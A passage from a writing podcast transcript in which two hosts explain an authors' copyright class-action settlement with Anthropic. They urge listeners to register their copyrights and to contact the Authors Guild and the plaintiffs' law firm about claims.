Meanwhile, because statutory damages are what is going to be paid by this company, that is why the registration matters. It's not just to make people mad. It's not just to… it's not a gatekeeping thing. It's a legal issue with the settlement. So if you have not been in the practice of registering your copyrights, it's a pretty darn good idea to do that now. It's a completely online process. The site is quite antiquated and not that much fun to work with, and there are some moments in there when you're like, “I don't understand what's being asked of me.” But it's worth taking the time. It costs, I believe, $65 for a single title. They mail it to you at home, and then you have the certificate forever with your copyright registration number, but it's also kept in that database. You are required to deposit a copy—two copies of… well, a digital copy of your book, or two physical ones, and we usually use digital at this point. But totally worthwhile, and all the people who've been slogging it out on the copyright website up till now are probably feeling pretty good about it.

Jess Lahey
Okay, so there's been this settlement, and I don't know yet whether or not my book is included in that settlement, because Anthropic has not turned over their list yet, but let's say I'm on it.
When can I get my sweet, sweet dollars?

Sarina Bowen
Well, right now there is a really important Authors Guild blog post about what to do, and we will also link to that, and they, in turn, link to—I think it's the lawyer's website with a form, a contact form—saying, yes, you know, please keep me in your thoughts and send me the email so that when the list is really ready, we can find each other.

Jess Lahey
And another plug for why you should be a member of The Authors Guild, if you qualify to be a member, is that The Authors Guild made sure that their authors were included in the class action suit.

Sarina Bowen
Well, just that they're going to hand over the names.

Jess Lahey
Yes. Exactly.

Sarina Bowen
Except I actually think that if you have multiple titles, if you have multiple publishers, if you use a pseudonym—there's lots of reasons to go to that lawyer's page and fill it out anyway.

Jess Lahey
Yeah.

Sarina Bowen
So, I mean, the worst that can happen is that both The Authors Guild and you have turned in your name, and they'll have to sort out some duplicates. But that is not the end of the world. And I went there, and I'm filling it in as well.

Jess Lahey
The Authors Guild is a great source of reliable, factual information on what is going on with this suit at the moment.

Sarina Bowen
It is, and it's not like… I'm very proud of my work on the council, but it's like a couple of meetings a month. But what's really happening is that the people who work at The Authors Guild—it's their job. It's a bunch of lawyers who are very good at copyright law, and they've been working on this, like, you know, without sleeping practically, for like a year and a half. So, you know, all of these suits are what they're focusing on all day long.
And they want to make sure that the greatest number of authors receive the compensation that they deserve, and it's basically like their whole entire lives right now.

Jess Lahey
It's always cool, actually, as a side note, in the annual meetings—I like to attend the annual meetings virtually—it's always amazing when they give sort of a download of what's been accomplished by The Authors Guild over the past year. It amazes me, the advocacy that's going on.

Sarina Bowen
It's a lot of suing people who aren't working on behalf of authors, and fighting against book bans and things like that.

Jess Lahey
Absolutely, absolutely. Is there anything else that we need to know that's pressing?

Sarina Bowen
Register your copyrights, people, let's go.

Jess Lahey
Go to the show notes. The links will be in the show notes, as Sarina said. Worst case scenario, you go to that lawyer website, law firm website, and you double—you know, you've done it, and so has your publisher. But who cares, whatever, as long as you've done the work. And, in fact, I will, when I write the show notes, be going back and doing the same myself. And you know, this is a moving target. This is not over yet. This is a continuing saga.

Sarina Bowen
Right.

Jess Lahey
Yeah, and it's definitely not like a done deal, like, “Yay, I'm going to be getting a check in the mail next week.”

Sarina Bowen
No.

Jess Lahey
That's not the way...

Sarina Bowen
It's going to take a long time, but there's going to be more of these suits. So, of course, the best time to register your copyright was five years ago. The second-best time is right now.

Jess Lahey
So, go do that. You have a to-do list. You have homework. Go do those things. And thank you for explaining that stuff. And thank you also for working with The Authors Guild. Because I know it's a ton of work.
Not only is it a ton of work for you, doing the meetings and all that sort of stuff, but it's hard to go online and see on social media so many people misunderstanding what this case is about, and you do a lot of clarifying, which is very sweet.

Sarina Bowen
Oh, thank you. But you know what? It's complicated.

Jess Lahey
It is very complicated.

Sarina Bowen
And I am not a lawyer, and I put in the time to understand it. But the truth is, it's hard. We're dealing with some really complicated concepts. IP is tricky, and, you know, I learn a little more every year, but it's hard, and if it confuses you, you are forgiven for feeling that way.

Jess Lahey
So, again, thank you. Go do your copyright thing. Go to the law firm website, go to The Authors Guild website, and just catch up. Catch up on what this is all about. And we will keep you posted in our little nerdy corner here, which I'm really excited about. I have a full page of questions I want to ask Sarina about some of the things that she understands really well about publishing and all of the stuff that goes into it—all these things, especially about independent publishing—that is not a world I'm a part of, but you always seem to have great answers to those questions. So we will be delivering those questions and answers to you in our Nerd Corner. And thank you so much for being with us. And until next week, keep your butt in the chair and your head in the game.

Narrator
The Hashtag AmWriting Podcast is produced by Andrew Perella. Our intro music, aptly titled Unemployed Monday, was written and played by Max Cohen. Andrew and Max were paid for their time and their creative output, because everyone deserves to be paid for their work. This is a public episode. If you'd like to discuss this with other subscribers or get access to bonus episodes, visit amwriting.substack.com/subscribe